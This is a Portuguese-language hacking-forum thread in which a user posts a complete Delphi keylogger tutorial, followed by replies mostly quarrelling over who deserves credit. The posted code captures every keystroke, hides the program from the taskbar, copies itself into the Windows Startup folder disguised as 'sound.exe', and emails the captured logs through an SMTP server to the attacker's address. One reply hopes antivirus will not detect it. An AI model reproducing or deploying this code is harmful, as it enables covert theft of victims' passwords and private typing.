Professia 0 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Primeiro crie um memo e nele que tudo vai fica armazenado apague a primeira linha , agora crie um timer mude o interval para 1 e insira o seguinte codigo : var i : byte; begin for i:=8 To 222 do begin if GetAsyncKeyState(i)=-32767 then begin case i of 8 : memo1.Lines[memo1.Lines.count-1] := copy(memo1.Lines[memo1.Lines.count-1],1,length(memo1.Lines[memo1.Lines.count-1])-1); //Backspace 9 : memo1.text:=memo1.text+'[Tab]'; 13 : memo1.text:=memo1.text+#13#10; //Enter 17 : memo1.text:=memo1.text+'[Ctrl]'; 27 : memo1.text:=memo1.text+'[Esc]'; 32 :memo1.text:=memo1.text+' '; //Space // Del,Ins,Home,PageUp,PageDown,End 33 : memo1.text := Memo1.text + '[Page Up]'; 34 : memo1.text := Memo1.text + '[Page Down]'; 35 : memo1.text := Memo1.text + '[End]'; 36 : memo1.text := Memo1.text + '[Home]'; //Arrow Up Down Left Right 37 : memo1.text := Memo1.text + ' '; 38 : memo1.text := Memo1.text + '[up]'; 39 : memo1.text := Memo1.text + ' '; 40 : memo1.text := Memo1.text + '[Down]'; 44 : memo1.text := Memo1.text + '[Print Screen]'; 45 : memo1.text := Memo1.text + '[insert]'; 46 : memo1.text := Memo1.text + '[Del]'; 145 : memo1.text := Memo1.text + '[scroll Lock]'; //Numeros 1234567890 Simbolos !@#$%^&*() 48 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+')' else memo1.text:=memo1.text+'0'; 49 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'!' else memo1.text:=memo1.text+'1'; 50 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'@' else memo1.text:=memo1.text+'2'; 51 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'#' else memo1.text:=memo1.text+'3'; 52 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'$' else memo1.text:=memo1.text+'4'; 53 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'%' else memo1.text:=memo1.text+'5'; 54 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'^' else memo1.text:=memo1.text+'6'; 55 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'&' else memo1.text:=memo1.text+'7'; 56 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'*' else memo1.text:=memo1.text+'8'; 57 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'(' else memo1.text:=memo1.text+'9'; 65..90 : // a..z , A..Z begin if ((GetKeyState(VK_CAPITAL))=1) then if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+LowerCase(Chr(i)) //a..z else memo1.text:=memo1.text+UpperCase(Chr(i)) //A..Z else if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+UpperCase(Chr(i)) //A..Z else memo1.text:=memo1.text+LowerCase(Chr(i)); //a..z end; //Numpad 96..105 : memo1.text:=memo1.text + inttostr(i-96); //Numpad 0..9 106:memo1.text:=memo1.text+'*'; 107:memo1.text:=memo1.text+'&'; 109:memo1.text:=memo1.text+'-'; 110:memo1.text:=memo1.text+'.'; 111:memo1.text:=memo1.text+'/'; 144 : memo1.text:=memo1.text+'[Num Lock]'; 112..123: //F1-F12 memo1.text:=memo1.text+'[F'+IntToStr(i - 111)+']'; 186 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+':' else memo1.text:=memo1.text+';'; 187 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'+' else memo1.text:=memo1.text+'='; 188 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'<' else memo1.text:=memo1.text+','; 189 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'_' else memo1.text:=memo1.text+'-'; 190 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'>' else memo1.text:=memo1.text+'.'; 191 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'?' else memo1.text:=memo1.text+'/'; 192 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'~' else memo1.text:=memo1.text+'`'; 219 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'{' else memo1.text:=memo1.text+'['; 220 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'|' else memo1.text:=memo1.text+'\'; 221 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'}' else memo1.text:=memo1.text+']'; 222 : if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+'"' else memo1.text:=memo1.text+''''; end; end; end; Agora va na paleta indy client e insira uma SMTP . Agora va na paleta indy misc e insira uma IDMessage . Selecione o IdSMTP e renomeio para SMTP Selecione o IdMessage1 e renomeio para Message1 Agora vamos inserir no form mais um timer e nele que vamos determinar a frequencia de envio de logs , é nele também que vamos inserir o codigo de envio . Agora selecione o interval para a frequencia de logs que vc quer q seja enviada a você . lembrando 1 segundo = 1000. Então uma hora sera 3600000 Agora insira o seguinte código no timer : with Message1 do begin Body.Assign(memo1.Lines); From.Text := '[email protected]'; Recipients.EMailAddresses := '[email protected]'; Subject := Logs; smtp.AuthenticationType := atlogin; // Indica que requer autenticação smtp.Username := '[email protected]'; smtp.Password := suasenha; smtp.Host := smtp.mail.yahoo.com.br; smtp.Port := 25; smtp.Connect; try smtp.Send(message1); // Envia finally smtp.Disconnect; // Desconecta memo1.text := ' ' ; end; end; Agora clique no form clique em events em oncreat digite FormCreat tire o begin e cole o seguinte codigo type TRegisterServiceProcess = function (dwProcessID, dwType:DWord) : DWORD; stdcall; var a : string ; Handle: THandle; RegisterServiceProcess: TRegisterServiceProcess; begin //*** Nao aparece na barra *********************************************** SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW). a := application.ExeName; If not fileexists ('C:\Documents and Settings\All Users\Menu Iniciar\Programas\Inicializar\sound.exe') then copyfile (Pcchar(a) ,PcChar('C:\Documents and Settings\All Users\Menu Iniciar\Programas\Inicializar\sound.exe') ,false) Agora clique em project view source e add o seguinte codigo no begin Aplication.ShowMainForm :=False; Nosso Key Loger tá pronto XD :aplauso::festa: Creditos : 50 % Professia 50 % Para curso vire hacker da noite pro dia . Agradece Por favor Não caio o dedo não \o/:chorando: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Owner 8 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Humm .... Vamos lá ! Sobre o código é muito bom, mas não vi muita diferença não ! E sou contra keyloogers ! Mas o tópico esta muito bom, esta bem formatado. Mas explica pra quem não sabe o que o código faz ! Vou agradecer por compartilhar mas não por que eu gosto de keyloogers Abrasz :amor: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Zaphey 2 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Apesar de eu ser totalmente contra esses tipos de programas, valeu por postar, pode ajudar a muitos que querem entrar nesse 'mal' caminho! Tópico bem explicado, só falta umas cores, tirando isso tá ótimo! Abrasz' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Evii 2 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Amigo todos esses códigos são todos do meu curso http://www.webcheats.com.br/forum/delphi-vb/726888-delphi7-curso-delphi7-vire-hacker-da-noite-pro-dia.html ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Vator 11 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Já deu pra ver que ele virou um "hacker" da noite pro dia... E não pode pedir pra agradecer. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Professia 0 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Ja ageitie os creditos malz é pq so tinhas os cod num bloco de notas ! :risada: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Evii 2 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · 20% pro tópico vire hacker da noite pro dia ? afff fassame o favor voçe copiou tudo de mim cara. devia ser 90% dos créditos meus e 10 por ter feito esse tópico orrivel. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~OwneR~ 8 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · Creditos : 80 % Professia HAHAHAHAHAHA, já ví esse mesmo código há muito tempo... Você deve ter uns 0,01% de créditos... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Professia 0 Postado 21 de Janeiro 2011 Compartilhar Postado 21 de Janeiro 2011 · 20% pro tópico vire hacker da noite pro dia ? afff fassame o favor voçe copiou tudo de mim cara. devia ser 90% dos créditos meus e 10 por ter feito esse tópico orrivel.[/color][/size][/font][/center] ¬¬ Topico horrivel ?? 90 % :chingando: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
-Systema- 0 Postado 22 de Janeiro 2011 Compartilhar Postado 22 de Janeiro 2011 · muito bom cara se funcionar e o anti vir nao detectar virus vou adorar =D so 1 pergunta pode ser qualquer email ali ne tanto quanto hotmail, yahoo, gmail obrigado @edit1 tem que dar F9 [RUN] nele ? ou nao precisa ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Professia 0 Postado 22 de Janeiro 2011 Compartilhar Postado 22 de Janeiro 2011 · Não precisa não cara ,olha que beleza fui punido por um flood que nao existe pelo galinho ¬¬ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Evii 2 Postado 22 de Janeiro 2011 Compartilhar Postado 22 de Janeiro 2011 · 00.1 % pra mim ? AFFFFFFFFF PRA VC , é tão facil ripar meus códigos e colar aqui na web cheats não é ? ai eu ganho apenas 50% ? se ainda tivesse feito um tópico decente mais nen isso fez,tópico horrivel sem cores n está centralizado horrivel horrivel. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Professia 0 Postado 22 de Janeiro 2011 Compartilhar Postado 22 de Janeiro 2011 · 00.1 % pra mim ? AFFFFFFFFF PRA VC , é tão facil ripar meus códigos e colar aqui na web cheats não é ? ai eu ganho apenas 50% ? se ainda tivesse feito um tópico decente mais nen isso fez,tópico horrivel sem cores n está centralizado horrivel horrivel.[/size][/center][/font] Bem meu amigo que meu desse esse codigo e também ele nao pego dessas videos aula pego daki É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se agora para de reclama que ja te dei um credito inexistente :fight: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
[L]ucas™ 0 Postado 22 de Janeiro 2011 Compartilhar Postado 22 de Janeiro 2011 · Não entendi muito bem o tópico se puder explicar melhor. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados